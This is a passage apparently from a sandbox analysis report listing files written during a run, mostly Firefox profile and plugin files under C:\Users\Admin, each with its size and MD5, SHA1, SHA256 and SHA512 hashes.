MD515838795f1e1a07c33f4e7774f561ee5
SHA1e4f7657e3de303e7b45132f21ed5d6e4586dea5f
SHA256ec42f48aacfa01517907a227a1d499b4b37c1a272e33572ef9dc1a63582e3c07
SHA51246483a6e3de88c97a7359209dafbd6c8dfc6fe501d1b1275f5bc15fa40fcaaee444e8030b3da9413617b77fc8873aba60f1de83f1e555ec49c2cdd9fd08d49f8
-
Filesize
360KB
MD501158ee151968c083231c083d408785c
SHA1ac9858abc36ac00f41463d6e94bd9fed94c637a7
SHA256b18cebbbfea253c5be93a66f96352e0de18fe51c9b13d340d2b483ccf36d3953
SHA5127dd316c4add287828b285231ae26eb1cb4c87bf27ca7729c826ff09ce1b8cac32b874f6c447ed3a44f501df752b22eeb1b64f65cf930d7af7057328cb1b49ac6
-
Filesize
230KB
MD547840b8162b9c6e7fe90ab0603d61f93
SHA12bcfbadfa40e35f1ef64e4a048f2df2e03ffbb5a
SHA2565e0f8bf19cc0e550fbc57f447e5b07597b9a2b04a71a4e67b10eb616f114d90b
SHA5129cf08d2f0bc4987b199bd893d398950a71a3a4a0f568da94aef236a9928b0b07b6ea54dfae967e36c2c518a7c715a52d083c50ddcabe3a439c87e6153caddb00
-
Filesize
758B
MD57a35f97ea68059a40497c814f2c10a5f
SHA1279527870f42cea02ab3d90bcd174e8992d2163a
SHA256097448d843adb271e655a648e16183d38d08293ce19aedcfaf017cebaecd6bd1
SHA51221d6b7562245f3049f5752bec170186ee5d75eceab2a5f652c0eddb884802c30f1efa2d7b57931e772b42cc30697326636ecb41b5d6e2891e744094e203f40f5
-
Filesize
764B
MD541c199d56ee88613939ba36689b5272f
SHA1c8ea27720461568200a6b1e65b26fcf34e0c40fa
SHA256bc9e83d6b316359195dd0e515be2163998a0100587f2f8a2105352afc8ef48e4
SHA51266511d865cdeb5039a660cd9551477c126d36eccaafa189c4c3dd97a31d4009a772e4138efc05ea0a840310c2f7b9a8ea1257432c310b706a06d9b052d306df2
-
Filesize
122KB
MD5db32131c3970c57d0ad200b8c586b9c8
SHA1adb5d20e012b668ad6cc77c166ade302607795dc
SHA256edd149ee8fc4e9ba7b0633b0b34bbc60f49fd4af949bbd06cdc46effcf9ec4a5
SHA512d57b106d8cfee5459492e945cfd2d1c28727b5f8e1e48c7ec39f64d1f1c0856d7a898b2e6abe964abca2df610e4d6384c14696fe79d6da87c6ac52dbc85e4783
-
Filesize
64KB
MD5ec2a94df8c01a560e0604c640b26ccdd
SHA11ac09f3302b2df40302a050cee5ba5b119291215
SHA256f0d88e80b23da7e59e76dd18d6b39737c577df9689ae49126ccafe5fbaeb5b5b
SHA512bbe7b24db1451d425e3b241075ed6dc564d798fa504b3e0d75edf876e582599d1709836062fbc7d5175d85eb179b635db3c940a89c20863f9dcd739b0f8b44ec
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
59KB
MD5dfb8e34f07291b05901c0d2a71e19442
SHA11b54535721482c0a3db1760541367a03deedc8c5
SHA2560cb98ad246cd2531c12ec31fe31a0c5afbef269c9c913eb06de547d3730ddcc7
SHA51209b5f13637608bcd1862b0d56af361c6acbe5f0100314fffe48a7f2266fb8d2bcc60ee9da5716ce20b73fefac9d6126f3488b12a44b2ac6f396f9051b5700379
-
Filesize
131KB
MD57aa824f055dc532c3e713734d5733577
SHA1d354d68335a862ab729ffae878b6f8a3cc774d97
SHA2566812a48a86b7a9ca84cffe83f8678db2c495b09866fbe1a204f9bfe39854cd49
SHA512e10d26b7d3156b9cda0d66cfbf31aaac7238e77d0fd0cd0c4e415f71867a0b3ca5254acbeda09109fb6f7bc2f92bb89682e52e7906af5ceb245db3c7a565e33c
-
Filesize
30KB
MD5f1548e92e0b2ffc07e003c7fae9ed9b9
SHA1575ba8922ebbec527d150ec7c65992feace266db
SHA2566b5b3edb8182fc38389ea991a97bc5bd798349e19aa9cacf413f415a3afbc0b5
SHA5129f7dd7bedfe3ae8d4c8caebe241ca25a6f77d52c085b5aadc8ac5ea91ffdfe06c1c776854d2a953e11eed4437c1a851f6fa3388988e2220e57e23bbb7130b470
-
Filesize
109KB
MD5e31afb9405514fd5b7ca3a02c5697de3
SHA1d0c67c8ac6be3ba39586c2364a80d82ea07e9898
SHA256d857088b8baa02a812fbeda516c74dc40907ddcd3e4d6a5be91b6c23042bd620
SHA5120a6ba0aa91608b66fbc90857fd784a381619eb1781472b711f9c4123beec84e9ccbd269c062fd9071c1a0d5d5bbc694d700d562cba34076df6ed06b9ab146b88
-
Filesize
478KB
MD5d772c64b8f02e063f7f8b1cea9509574
SHA12aa72a8f3e6474e0d9d23cbf88b72cf60415a82b
SHA2565c61934f8c63bd21694d648b69f70f426e8a462525c0ff6e4484464267961461
SHA5126a497260969280d67c2ebbaddd24312e10fb4bfeecbc7f3f85d7ca6ca7c9afcbf1a2257f566a6cedf685abf9ec2c28ab7f643b173c52c6089578b7615d382c5c
-
Filesize
120KB
MD562ee0376f7b66f93856090027793c5ae
SHA1358d6750df4765fea465451f1024892c132a8b5e
SHA256312044d1badf072170a55deab7e126bcd766826ce201febc4a8dd74a7783f391
SHA51274562de1769ffffdffc5518428bcdb5eadbd972f69ca37fa0971bf89f30ebaf41dacf2fe0b5373ffa0e1fe792f1bcb0aea0085ed0f94097cbfe5c23f3ee1edeb
-
Filesize
31KB
MD556f234f3854b87f2da60d4370c80f4ef
SHA17196616a8c40ffd498de9fc18ef0b4182a410c5b
SHA256e652ac7a40a3c797a190dc16d1741910d3785609289fef8379d488abec53ffc6
SHA512a3ae351b9c35df7634ac622509a25bc2006f20b643c48efe521278ee6a1c40e69ee4c981bb9d53be783d203e3ddf87479846baeeaaabb026ed411ba3b7163176
-
Filesize
87KB
MD544af3d9f2851fc9d3758542d4b83beb0
SHA100e5819a99f6bd7b8a91c56a20b4a04603ba1fdc
SHA2566ec134b5a0eac1fac5216470cef1fd3a4d1a8d061d429030a9d12f7978aed5a9
SHA512633b59dc281727cd5321b8135d0b5929bb0d37b7123913b777ddf2dbc7f5d3e71e4d7377750c97d4398596edb5b18f53d514356833613e5b0713bb0438a96e6f
-
Filesize
62KB
MD5d0a3f0692a9b5c96b6c1dfcb8192fdc6
SHA1ca70a2d0ca34f6b06f4de3bd035e14183102a571
SHA256bd20e251d01cf8ab324683f697faee6aa0dab7484609d5db9d5c98f84af49d72
SHA51252290b8a0e714c0a5f03504e521c4e5511f53217985032db83a205b6b22baf18f5cfb23c353dc7aded90c43ff925ac8ef80b94bc086f7a8de4f93cbc13f94095
-
Filesize
62KB
MD5354d8dade537bd6b724e2c0385910994
SHA13fbfaf7a3806875311b74f8152d803a6385b6956
SHA256ccb09907d574bb0f0e90db133039589205342f74d6410592841f1fb49b0b8678
SHA5121a4869a55a65b2aa8f80e9284955ba66636da8dfbdb528d5b31b2ce469181403577708ed2c899c68c61ab9b9d33c140a8b8aa0c52ce94c375812a9e537527363
-
Filesize
78KB
MD543beeaedf4525e9ee2174012ee5ad60b
SHA167686a082061f90467fbd0536443175f5a2e77cc
SHA256d672d30549406465eadc12703e91bf70014e81c60ef68d6b60f77b23c313e6b5
SHA5129561e01bf0d52f2b32ccbff5c1bf74f97b414b6c89753c963d0302963534e3acbbc171670d0bd3d9fae0ea0b19de58cc04bda5b3864b7aff07dc3d1c85e4a5ac
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
70KB
MD56f2d9e28fc8288ba6a6858607da20564
SHA1195eee4913f5a2d43ef717d7e4afed13f28c9ab9
SHA25678e49500799a356e0ead812924ee64ba4a89031845df0c4b4d3a7c704d2ea84a
SHA512fe930932d16863726ed3afd771d0a7d7ef0501ff5057325d0e7cb3466ded3783168736ef2b3c46774c7df09b441b82b455288b7eeb80c6ac39e0b64197d7cd95
-
Filesize
50KB
MD5c4af150b901a67bd95170ce3449b5c95
SHA195daab7704c8f186c963260596f274b0ae6f4fad
SHA25653c65f7778006abe3ff0f8b696b80f22eea2f642313ef7c8b489aae884645852
SHA51230078fdf0a5e69aa8df65f275ac26f75fb1ce548b231367cb7ef94cd1deddd3f5171dbe56f924c5c79c587f187f7563ffc482e6690b2e275bd823e231a66b42d
-
Filesize
17KB
MD58302276f879565bfcf18de8278fa2df2
SHA15ade1c7516c3299b9a3572766a6512ef079f1aa1
SHA256dd59aeaa649c3116f43228bf8da6614ae31d57e2da00777ab3b3e8dacd14258a
SHA512515352faf704f9026bf22df113089d13ff0c9de6059efc28fef9d1371ca49618a55fa19c414a8493cf354e525b288bc342732d88aa3fe3143e3fea58107dbade
-
Filesize
79KB
MD54bfd15f3a354c7a93533787429a3a645
SHA10a114c1d163c1417b97f21e21b48778b87fd9ad3
SHA25631d5191e194b80b12101da35ab1a87a1d99db2ef2ee884855a02dedda29c5632
SHA512333ac5f64e86f67a472bdcdcb69ce85fe670da874bc7f5c18398e390b5ecb767e945c3ab13e9ba7ad65ca4c7e367c3cdf99e52a478d3f9e1ac0f6bcd0decdca6
-
Filesize
720B
MD5abbb43edd09809a8bc4108fdd1a8ccd3
SHA1a5f0a37629ac13c4d0bac0301f79462307562270
SHA256795535fb5d2a6306d4fc28ca2a9652363d26966489d74ab6ad36116f879f0110
SHA512352f84042530842074988c5a9399bd1d3098455977ad5a477224452478c30eafdba4ddde9a5cff927e7d823928fdd652bf7a030af7fbfae21bc18fb5f28dbaeb
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
8.0MB
MD5a01c5ecd6108350ae23d2cddf0e77c17
SHA1c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD545295482f56aa50487bd878a2f5b9994
SHA11967cfadac59e6abd7d976dde972b326fde540cb
SHA256bf83f07cace18258f24b053e5c1b4a56fe186e67d7b63295eb4effb697be9d86
SHA512ea0febad890c8794547d9cf7ef65e2a4d28f8a2a0def1d2208cacb7d600a51d043f3a8def292b7525540f56a33709eb975aa41beed6c7f170db1d38553cc7050
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\tmp\0b5b6376-1db8-4808-a7e5-c0c8cfa171b8
Filesize12KB
MD5377500b5b2617956190d8f305603a48e
SHA1af19a81ed86e4b6b1f7c67299740803fd8bcc887
SHA25649b852a4563436befe3fbc0781d81e90dc7f8afce181e85f55c22ba805be3a9f
SHA5121d88f3971cea875eb5fe201ec78e7e3cb93a18d1a6fef1b8127ca07d692c917421bbd6d56b82cb4285fb29ca40eff9193546c0584777f8ad17261cad8fc42acb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\tmp\95d6788b-c56b-4746-a8c7-eb2cfdeced24
Filesize745B
MD562a5b36605023c1ca3ab70ad58fb03a7
SHA124573849a0cfc7bcb6c9f46565f5b4687d52e1de
SHA2561bd2c1e998418d93e88e5db45995d94decba769f38bdad09694bad4ffa6f61c3
SHA512352852c6604e4a1ec615f1fa33634887ed70cf19b5f7539f6b1b61acd9f9781b8ea6bfec5c1045206568773aa39fcd2499c35ba69083edb0863526d060252485
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
6KB
MD5b0e692ffb0c5d3c212cb89850900d055
SHA189abfce27e11716f68690a1329576d6ab1d1fd31
SHA25689419c6f558eed4f96ac538ebd218aebdfaef02fbcfb971557fd4da32aa20733
SHA512d6a88b4ba58b3fbd766a260c7796e1e5702053d6ee277d67f26862fe4b7a50da46044f03c67ce2df91db22549fa97ffe1e171c73dfc9b21f48ce535c566ec79d
-
Filesize
7KB
MD59f7772207db318c43938693e7181eab6
SHA1b0468fc818c789f758ce52e54b961ad89b54d5c4
SHA256a1799acc26a50f5c5504d86670996a2c4084af40fc15c0f4f61e4b03a2092495
SHA512e234d71c347b4f6038b78ab6ce880ae727d4dfd7d94d72bfb63c3280b64d94ad03c8c5d551be490c8492a578443d793b859c2b1cc10d7ccf38b6a0fabc30132e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD566d4be8a15b2aa00db8b85d8e715b85e
SHA111c5b6dbd28c744a84a7a1c6a6fe593874e350ee
SHA25699ffd4af3353c3377ac4fd1aac5adc0bb1a15ee656ee72779e9ed085ff641882
SHA512510c6cf339c46ecf9496678cac3e6cbd0f01c21edbdbe99c516392ab3c50c4ee72ab59ab92e97ee8ad1a72233999deabea8ac35a8d572ef465c23bdeb1de4e59
-
Filesize
1.8MB
MD55b255759eb7f38d7d89f1ef670509339
SHA19eb560cbeac2209209e6187998f86cd4d4cea6a7
SHA256c04478baef60f5a6860b939b5a15c5306495b06a302f694ce3da8aeb973a16b8
SHA512bee3c71ab3c4d4b891ea3f7569fda345046c5ea84d39e3037e63f0b71a4a97411c8e67a177cac2b4876ac65ace2ab6b85eee2d2257bfd699686a36fd0f6138b2
-
Filesize
925KB
MD562d09f076e6e0240548c2f837536a46a
SHA126bdbc63af8abae9a8fb6ec0913a307ef6614cf2
SHA2561300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49
SHA51232de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f
-
Filesize
1.9MB
MD5b58f41c35fe6b79046d9aa084a175eb9
SHA17b18e2694be1d189282b8b59f391e298aa9d88ee
SHA256afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967
SHA5127e9bd888e41a2bb3f07f5f63d236ee491c5265ef6014f9adee03411276d53d104511a00eddb5653663e037561fe0c84b7c0d986ac4f3332fa4c1928d837bcccf